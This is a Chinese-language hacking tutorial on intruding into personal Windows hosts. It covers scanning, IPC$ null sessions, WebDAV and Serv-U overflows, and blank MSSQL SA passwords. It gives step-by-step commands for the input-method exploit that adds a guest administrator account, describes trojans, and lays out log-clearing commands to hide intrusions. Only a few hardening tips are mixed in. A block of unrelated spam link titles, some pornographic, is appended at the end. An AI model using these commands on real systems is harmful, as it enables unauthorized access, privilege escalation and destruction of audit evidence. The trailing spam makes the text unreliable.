入侵個人主機網(wǎng)絡的步驟
第一步:隱藏自已的位置
為了不在目的主機上留下自己的IP地址,防止被目的主機發(fā)現(xiàn),老練的攻擊者都會盡 量通過“跳板”或“肉雞”展開攻擊。所謂“肉雞”通常是指,HACK實現(xiàn)通過后門程序控制 的傀儡主機,通過“肉雞”開展的掃描及攻擊,即便被發(fā)現(xiàn)也由于現(xiàn)場遺留環(huán)境的IP地址是 “肉雞”的地址而很難追查。
第二步:尋找目標主機并分析目標主機
攻擊者首先要尋找目標主機并分析目標主機。在Internet上能真正標識主機的是IP地 址,域名是為了便于記憶主機的IP地址而另起的名字,只要利用域名和IP地址就可以順利地 找到目標主機。當然,知道了要攻擊目標的位置還是遠遠不夠的,還必須將主機的操作系統(tǒng) 類型及其所提供服務等資料作個全面的了解。此時,攻擊者們會使用一些掃描器工具,以試 圖獲取目標主機運行的是哪種操作系統(tǒng)的哪個版本,系統(tǒng)有哪些帳戶,開啟了哪些服務,以 及服務程序的版本等資料,為入侵作好充分的準備。
第三步:獲取帳號和密碼,登錄主機
攻擊者要想入侵一臺主機,首先要有該主機的一個帳號和密碼,否則連登錄都無法進 行。這樣常迫使他們先設法盜竊帳戶文件,進行破解,從中獲取某用戶的帳戶和口令,再尋 覓合適時機以此身份進入主機。當然,利用某些工具或系統(tǒng)漏洞登錄主機也是攻擊者常用的 一種技法。
第四步:獲得控制權
攻擊者們利用各種工具或系統(tǒng)漏洞進入目標主機系統(tǒng)獲得控制權之后,就會做兩件事 :清除記錄和留下后門。他會更改某些系統(tǒng)設置、在系統(tǒng)中置入特洛伊木馬或其他一些遠程 操縱程序,以便日后可以不被覺察地再次進入系統(tǒng)。此外,為了避免目標主機發(fā)現(xiàn),清除日 志、刪除拷貝的文件等手段來隱藏自己的蹤跡之后,攻擊者就開始下一步的行動。
第五步:竊取網(wǎng)絡資源和特權
攻擊者找到攻擊目標后,會繼續(xù)下一步的攻擊。如:下載敏感信息;竊取帳號密碼、 個人資料等。
三、網(wǎng)絡攻擊的原理和手法
1、從掃描開始
掃描往往是攻擊的前奏,通過掃描,搜集目標主機的相關信息,以期尋找目標主機的漏洞。 常見的掃描工具有X-scan、superscan、流光、X-port等。
在這些工具中,國產(chǎn)的X-scan與流光可算的上是兩個“利器”,這兩個工具不但具有相當快 的掃描速度和精確度(個人感覺X-scan在掃描速度上可能更快一點),同時還是發(fā)起攻擊的 第一手選擇,當然在攻擊方面,流光更為強悍些。
除了常見個WWW(80)、FTP(21)、TELNET(23)等,查查十大高風險事件,我們就知道, 攻擊者通常還對下列端口很感興趣:
135:MS RPC,可以產(chǎn)生針對Windows 2000/XP RPC服務遠程拒絕服務攻擊,以及RPC溢出漏 洞,著名的“沖擊波”“震蕩波”就是利用DCOM RPC感染設備;
137~139:NetBIOS,WINDOWS系統(tǒng)通過這個端口提供文件和打印共享;
445:Microsoft-ds,非常重要的端口,LSASS漏洞、RPC定位漏洞都在這里出現(xiàn);
1433:Microsoft SQL,后面會提到,SQL SERVER默認安裝時留下的空口令SA用戶可以讓攻 擊者為所欲為;
5632:PCANYWERE,一種遠程終端控制軟件;
3389:WINDOWS遠程終端服務
4899:RADMIN,一種遠程終端控制軟件
由此可見,沒有掃描,自然也就沒有攻擊,從安全的角度的來說,個人主機最安全的系統(tǒng)應 該算是WINDOWS98,由于WINDOWS98幾乎不開啟任何服務,自然也沒有任何開放端口,沒有端 口,對于這類系統(tǒng)攻擊的可能性就大大降低。當然,XP在打了SP2的補丁后,等于有了一個 基于狀態(tài)的個人防火墻,相對安全性也提高了很多。
2、攻擊開始
掃描到有開放的端口,下一步自然是針對相關端口發(fā)起攻擊,針對不同端口常見攻擊方式有 :
139/445:“永恒”的IPC$(未發(fā)現(xiàn)此漏洞)
說是“永恒”,主要是因為這種漏洞基本已經(jīng)只能存在于記憶中了。
什么是IPC,IPC是共享“命名管道”的資源,主要用于程序間的通訊。在遠程管理計算機和 查看計算機的共享資源時使用。什么是“空連接”,利用默認的IPC我們可以與目標主機建 立一個空的連接(無需用戶名與密碼),而利用這個空的連接,我們就可以得目標主機上的 用戶列表。
得到用戶列表有什么用?我們可以利用IPC,訪問共享資源,導出用戶列表,并使用一些字 典工具,進行密碼探測。得到了用戶權限后,我們可以利用IPC共享訪問用戶的資源。但所 謂的ipc漏洞ipc漏洞,其實并不是真正意義上的漏洞,WINDOWS設計初衷是為了方便管理員 的遠程管理而開放的遠程網(wǎng)絡登陸功能,而且還打開了默認共享,即所有的邏輯盤(c,d,e ……)和系統(tǒng)目錄winnt或windows(admin)。所有的這些,初衷都是為了方便管理員的管理, 但好的初衷并不一定有好的收效,曾經(jīng)在一段時間,IPC$已經(jīng)成為了一種最流行的入侵方式 。
IPC$需要在NT/2000/XP下運行,通常如果掃描出目標開放了139或445端口,往往是目標開啟 IPC$的前兆,但如果目的主機關閉了IPC $連接共享,你依然無法建立連接,同樣如果管理 員設置禁止導出用戶列表,你就算建立IPC$連接也無法看到對方的用戶列表。另外提醒一下 ,WINXP系統(tǒng)中,已經(jīng)禁止了遠程用戶的訪問權限,因此,如果對方是XP的操作系統(tǒng),就別 費這個勁了。
如何防范ipc$入侵
1禁止空連接進行枚舉(此操作并不能阻止空連接的建立,引自《解剖win2000下的空會話》)
首先運行regedit,找到如下組建 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001(如果設置為2的話,有一些問題會發(fā)生,比如一些WIN的服務出現(xiàn) 問題等等)
2禁止默認共享
1)察看本地共享資源
運行-cmd-輸入net share
2)刪除共享(每次輸入一個)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續(xù)刪除)
3)停止server服務
net stop server /y (重新啟動后server服務會重新開啟)
4)修改注冊表
運行-regedit
server版:找到如下主鍵 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把 AutoShareServer(DWORD)的鍵值改為:00000000。
pro版:找到如下主鍵 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把 AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建(右擊-新建-雙字節(jié)值)一個主健再改鍵值。
3永久關閉ipc$和默認共享依賴的服務:lanmanserver即server服務
控制面板-管理工具-服務-找到server服務(右擊)-屬性-常規(guī)-啟動類型-已禁用
4安裝防火墻(選中相關設置),或者端口過濾(濾掉139,445等)
5設置復雜密碼,防止通過ipc$窮舉密碼
除了IPC$,我們還可以利用例如SMBCRACK通過暴力猜解管理員口令,如果對方未打補丁,我 們還可以利用各種RPC漏洞(就是沖擊波、震蕩波用的那些漏洞),通過各種溢出程序, 來得到權限提升(原理和病毒感染的原理是一樣的)。
21:Serv-u入侵(未測試使用)
Serv-u是常用的FTP SERVER端軟件的一種,因為常用,所以被研究出的漏洞也不少,如果對 端開放了21端口,并且采用Seru-U來架站的話,可以查看一下對端的版本。對5. 004及以下 系統(tǒng),可用溢出入侵。(serv5004.exe)對5.1.0.0及以下系統(tǒng),有一個本地提升權限的漏 洞。(servlocal.exe)
Serv-U FTP Serve在設置用戶以后會把配置信息存儲與ServUDaemon.ini文件中。包括用戶 的權限信息和可訪問目錄信息。本地受限用戶或者是遠程攻擊者只要能夠讀寫Serv-U FTP Serve的文件目錄,就可以通過修改目錄中的ServUDaemon.ini文件實現(xiàn)以Ftp進程在遠程、 本地系統(tǒng)上以FTP系統(tǒng)管理員權限來執(zhí)行任意命令。
80:曾經(jīng)的神話“WEBDAV”(使用情況,成功溢出4臺主機,并登陸其中一臺,其他3臺的 IIS重啟)
微軟的IIS功能強大,但遺憾的是同樣漏洞多多,如果IIS不打補丁到SP3的話,那么就有一 個著名的WEBDAV漏洞。
Webdav漏洞說明:
Microsoft Windows 2000 支持“萬維網(wǎng)分布式創(chuàng)作和版本控制 (WebDAV)”協(xié)議。RFC 2518 中定義的 WebDAV 是超文本傳輸協(xié)議 (HTTP) 的一組擴展,為 Internet 上計算aIIS 服務 (默認情況下在 LocalSystem 上下文中運行)的安全上下文中運行。 盡管 Microsoft 已 為此弱點提供了修補程序并建議客戶立即安裝該修補程序,但還是提供了其他的工具和預防 措施,客戶在評估該修補程序的影響和兼容性時可以使用這些工具和措施來阻止此弱點被利 用。
可以使用掃描器:Webdavscan(是一個專門用于檢測IIS 5.0 服務器是否提供了對WebDAV的 支持的掃描器)來查找網(wǎng)絡中存在WEBDAV漏洞的主機,并用溢出程序:wdx.exe來進行攻擊 當溢出成功后,就可以使用telnet或者是nc等連接到目標主機的7788端口。
如:telnet 127.0.0.1 7788
如果正常的話,將出現(xiàn)以下提示:
Microsoft Windows 2000 [Version 5.00.2195] (C) 版權所有 1985-2000 Microsoft Corp. C:\WINNT\system32>
OK!
如何防御:
1. 搜索注冊表中的如下鍵:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters
增加如下注冊表鍵值:
value name: DisableWebDAV
Data type: DWORD
value data: 1
2. 使用MS提供的專用補!
1433:Microsoft SQL的SA空口令(掃描到4臺,成功登陸其中3臺)
微軟的MSSQL7.0以下的版本在默認安裝時其SA(System Administrator)口令為空,所開端口 為1433,這個漏洞很早了,但直到現(xiàn)在我們依然可以掃描到很多空口令的SA。更為“搞笑” 的是,微軟為了能夠讓SQL管理員管理方便,還設計了一個xp_cmdshell來執(zhí)行各種相關命令 。一個入侵者只需要使用一個MS SQL客戶端與SA口令為空的服務器連接就可以獲得System的 權限,并可以在目標主機上執(zhí)行任意命令。
攻擊方式,利用“流光”或其他掃描工具可以掃描、破解SA口令,破解成功后可以使用SQL 客戶端(如SQLEXEC)連接,并獲得系統(tǒng)權限。
解決辦法:
更改SA管理用戶口令;
刪除XP_CMDSHELL命令。(但并不保險,因為如果擁有SA權限,還是可能恢復該命令的)
3389:3389輸入法漏洞(不太可能存在了,但可以猜解管理員用戶口令)
Microsoft Windows 2000 Server及以上版本在安裝服務器時,其中有一項是超級終端服務 ,該服務可以使用戶通過圖形界面象管理本地計算機一樣控制遠程計算機(因此成為眾多攻 擊者的最愛)。該服務所開放的端口號為3389,是微軟為了方便用戶遠程管理而設。但是中 文Windows 2000存在有輸入漏洞,其漏洞就是用戶在登錄Windows 2000時,利用輸入法的幫 助文件可以獲得Administrators組權限。
1、用終端客戶端程序進行連接;
2、按ctrl+shift調出全拼輸入法(其他似乎不行),點鼠標右鍵(如果其幫助菜單發(fā)灰, 就趕快趕下家吧,人家打補丁了),點幫助,點輸入法入門;
3、在\"選項\"菜單上點右鍵--->跳轉到URL\",輸入:c:\\winnt\\system32\\cmd.exe.( 如果不能確定NT系統(tǒng)目錄,則輸入:c:\\ 或d:\\ ……進行查找確定);
4、選擇\"保存到磁盤\" 選擇目錄:c:\\inetpub\\s\\,因實際上是對方服務器上文件自身 的復制操作,所以這個過程很快就會完成;
5、打開IE,輸入:http://ip/s/cmd.exe?/c dir 怎么樣?有cmd.exe文件了吧?這我們就 完成了第一步;
6、http://ip/s/cmd.exe?/c echo net user guest /active:yes>go.bat
7、http://ip/s/cmd.exe?/c echo net user guest elise>>go.bat
8、http://ip/s/cmd.exe?/c echo net localgroup administrators /add
guest>>go.bat
9、http://ip/s/cmd.exe?/c type go.bat 看看我們的批文件內容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
10、在\"選項\"菜單上點右鍵--->跳轉到URL\",輸入:c:\\inetpub\\s\\go.bat --->在磁 盤當前位置執(zhí)行;
11、OK,.這樣我們就激活了服務器的geust帳戶,密碼為:elise,超級用戶!
注意事項:
當你用終端客戶端程序登陸到他的服務器時,你的所有操作不會在他的機器上反應出來,但 如果他正打開了終端服務管理器,你就慘了了:(這時他能看到你所打開的進程id、程序映 象,你的ip及機器名,并能發(fā)消息給你!
1.在IE下,所擁有的只是iusr_machine權限,因而,你不要設想去做越權的事情,如啟動 telnet、木馬等;
2.url的跳轉下,你將擁有超級用戶的權限,好好利用吧 :-)
這個漏洞在WIN2000 SP1中已經(jīng)修改,因此,實際網(wǎng)絡中存在此漏洞的機器幾乎沒有,但是 ,據(jù)說紫光2.3版本、超級五筆的輸入法中又發(fā)現(xiàn)此漏洞。
解決方法
1.打補;
2.刪掉相關輸入法,用標準就可以;
3.服務中關掉:Terminal Services,服務名稱:TermService,對應程序名:system32 [url=file://\\termsrv.exe]\\termsrv.exe[/url];
如果對方已經(jīng)修改了輸入法漏洞,那么只能通過猜解目標管理員口令的方法來嘗試遠程登陸 。
5632/4899:PCANYWERE和RADMIN
這是兩種遠程控制軟件,使用方式與遠程終端訪問類似,都支持圖形化界面對遠程計算機進 行管理,設計的初衷是為了讓管理員能夠更方便的管理設備,但這些軟件,特別是RADMIN, 可以設置其在安裝時,不出現(xiàn)任何提示,這種方式使RADMIN更多的被做為一種木馬使用。攻 擊者會注意掃描這些端口,因為一旦破解了相應口令就可以象操作本地計算機一樣控制目標 。
23:猜解ADSL MODEM口令
很多時候,掃描只能得到一個23端口,不要沮喪,因為對于個人主機而言,這往往是因為目 標主機采用了一個ADSL MODEM上網(wǎng)。一般用戶在使用ADSL MODEM時,往往未加設置,這時, 攻擊者往往可以利用ADSL MODEM的默認口令,登陸ADSL,一旦登陸成功,就有可能竊取ADSL 帳戶和口令,并可以查看到內網(wǎng)的IP地址設置,并通過配置NAT映射將內網(wǎng)PC的相關端口映 射到公網(wǎng)上,然后對其進行各種破解、攻擊。
特洛伊木馬
掃描端口、通過各種方法獲得目標主機的用戶權限之后,攻擊者往往利用得到的權限上傳執(zhí) 行一個“木馬”程序,以便能夠更方便的控制目標主機。
特洛伊木馬是一種或是直接由一個黑客,或是通過一個不令人起疑的用戶秘密安裝到目標系 統(tǒng)的程序。一旦安裝成功并取得管理員權限,安裝此程序的人就可以直接遠程控制目標系統(tǒng) 。實際上,對于各種個人主機,在未開放端口和打全補丁后,最有效的攻擊方式還是“木馬 ”程序。攻擊者往往利用捆綁方式將木馬程序與一個普通的EXE文件、JPG或其他正常文件綁 定在一起,并利用“社會工程學”的方式,欺騙對方執(zhí)行程序、查看圖片等。在對方執(zhí)行程 序、打開圖片后,木馬程序就悄無聲息在用戶的PC上執(zhí)行,并將用戶的一些相關信息通過 EMAIL或其他方式發(fā)送給攻擊者,而攻擊者則可以通過木馬程序實施對用戶電腦的控制,比 如控制文件、注冊表、鍵盤記錄甚至控制屏幕等。
在早期,木馬程序程序隱藏的并不深,通過查看任務管理器就會發(fā)現(xiàn)系統(tǒng)內存在不明程序在 運行,并且木馬程序還會在用戶主機上監(jiān)聽特定端口(如冰河的7626),等待攻擊者的連接 。典型的早期木馬如BO、BO2000、SUBSERVEN、國產(chǎn)的經(jīng)典木馬“冰河”等……這種方式的 木馬容易被發(fā)現(xiàn),而且被攻擊目標也必須連接在公網(wǎng)上,因為客戶端是無法透過NAT、防火 墻連接到內網(wǎng)的用戶的。
反彈端口類型木馬,“廣外女生”木馬是國內出現(xiàn)最早反彈端口類型的木馬,這個木馬與傳 統(tǒng)的木馬不同,它在執(zhí)行后會主動連接外網(wǎng)的攻擊者的相關端口,這種方法就避免了傳統(tǒng)木 馬無法控制內部用戶的弊端(因為防火墻一般不會對內部發(fā)出的數(shù)據(jù)做控制)。此外,“廣 外女生”還會自動殺掉相關殺毒程序的進程。
傳統(tǒng)木馬在執(zhí)行后會作為一個進程,用戶可以通過殺掉進程的方法關閉,而現(xiàn)在的木馬則會 將自己注冊一個系統(tǒng)服務,在系統(tǒng)啟動后自動運行。甚至會通過DLL注入,將自己隱藏在系 統(tǒng)服務身后。這樣用戶查看進程的時候既看不到可疑進程,也看不到特殊服務……典型代表 “灰鴿子”“武漢男生”。
ASP木馬,典型代表“海陽頂端網(wǎng)木馬”。隨著ASP 技術的發(fā)展,網(wǎng)絡上基于ASP技術開發(fā)的 網(wǎng)站越來越多,對ASP技術的支持可以說已經(jīng)是windows系統(tǒng)IIS服務器的一項基本功能。但 是基于ASP技術的木馬后門,也越來越多,而且功能也越來越強大。ASP程序本身是很多網(wǎng)站 提供一些互動和數(shù)據(jù)處理的程序,ASP木馬則是利用ASP語言編制的腳本嵌入在網(wǎng)頁上,當用 戶瀏覽這些網(wǎng)頁時會自動執(zhí)行相關ASP腳本,被木馬感染,這種方式更加簡單和隱蔽,需要 注意的是,ASP木馬往往是依靠IE瀏覽器的一些漏洞來執(zhí)行的,因此給IE打補丁是防范ASP木 馬的方法之一(當然并非萬能,還有一些木馬會利用IE的未知漏洞傳播)。
清除日志
攻擊者在取得用戶權限后,為了避免被發(fā)現(xiàn),就要考慮清除用戶主機的相關日志,因為日志 系統(tǒng)往往會記錄攻擊者的相關攻擊過程和信息。
Windows2000的日志文件通常有應用程序日志、安全日志、系統(tǒng)日志、DNS服務器日志、FTP 日志、WWW日志等等,可能會根據(jù)服務器所開啟的服務不同。
一般步驟如下:
1.清除IIS的日志。
可不要小看IIS的日志功能,它可以詳細的記錄下你的入侵全過程,如你用unicode入侵 時ie里打的命令,和對80端口掃描時留下的痕跡。
1. 日志的默認位置:%systemroot%\system32\logfiles\w3svc1\,默認每天一個日志 。那我們就切換到這個目錄下吧,然后 del *.*。但由于w3svc服務還開著,日志依然還在 。
方法一: 如有3389可以登錄,那就用notepad打開,按Ctrl+A 然后del吧。
方法二: net 命令
C:\>net stop w3svc
World Wide Web Publishing Service 服務正在停止。(可能會等很長的時間,也可能 不成功)
World Wide Web Publishing Service 服務已成功停止。
選擇先讓w3svc停止,再清除日志,不要忘了再重新打開w3svc服務。
C:\>net start w3svc
2. 清除ftp日志
FTP日志默認位置:%systemroot%\sys tem32\logfiles\msftpsvc1\,默認每天一個日 志,清除方法同上。
3. 清除Scheduler日志
Scheduler服務日志默認位置:%systemroot%\schedlgu.txt。清除方法同上。
4. 應用程序日志、安全日志、系統(tǒng)日志、DNS日志默認位置:%systemroot%\sys tem32\config 。清除方法同上。
注意以上三個目錄可能不在上面的位置,那是因為管理員做了修改?梢宰x取注冊表值 得到他們的位置:
應用程序日志,安全日志,系統(tǒng)日志,DNS服務器日志,它們這些LOG文件在注冊表中的
HKEY_LOCAL_MACHINE\sys tem\CurrentControlSet\Services\Eventlog
Schedluler服務日志在注冊表中的
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
5.清除安全日志和系統(tǒng)日志了,守護這些日志的服務是Event Log,試著停掉它!
D:\SERVER\system32\LogFiles\W3SVC1>net stop eventlog
這項服務無法接受請求的 "暫停" 或 "停止" 操作。沒辦法,它是關鍵服務。如果不用 第三方工具,在命令行上根本沒有刪除安全日志和系統(tǒng)日志的可能!打開“控制面板”的“ 管理工具”中的“事件查看器”,在菜單的“操作”項有一個名為“連接到另一臺計算機” 的菜單,點擊它然后輸入遠程計算機的IP,然后選擇遠程計算機的安全性日志,右鍵選擇它 的屬性,點擊屬性里的“清除日志”按鈕,同樣的方法去清除系統(tǒng)日志!
6.上面大部分重要的日志你都已經(jīng)清除了。然后要做的就是以防萬一還有遺漏的了。
del以下的一些文件:
\winnt\*.log
system32下
\logfiles\*.*
\dtclog\*.*
\config\*.evt
\*.log
\*.txt
主站蜘蛛池模板:
天天噜夜夜操|
波多野结衣免费观看视频
|
tube69xxx最新片|
国产播放|
国产成年|
成人影院一区二区三区|
国产成人精品免费视频|
国产大陆亚洲精品国产|
国产精品久久久久久久久免费|
国产三级久久|
国产看片一区二区三区|
国产欧美成人xxx视频|
国产人做人爱免费视频|
国产一区二区三区在线看|
国内精品视频成人一区二区|
韩国在线精品福利视频在线观看|
九九99re在线视频精品免费|
精品欧美一区二区在线观看欧美熟|
九九久久精品视频|
久久99网站|
韩国a级毛片|
国产香蕉尹人综合在线观|
国产精品视频久久|
国产成人免费片在线观看|
成人久久久|
69久成人做爰视频|
伊人99re|
亚洲精品人成在线观看|
偷拍自拍第一页|
欧美中文字幕在线视频|
女人张开腿让男人桶免费最新|
免费观看视频成人国产|
精品日韩二区三区精品视频|
韩国v欧美v亚洲v日本v|
国产91在线 | 亚洲|
在线久久|
特级淫片欧美高清视频蜜桃|
频黄|
欧美白人和黑人xxxx猛交视频|
美国第一毛片|
精品欧美一区二区在线观看欧美熟
|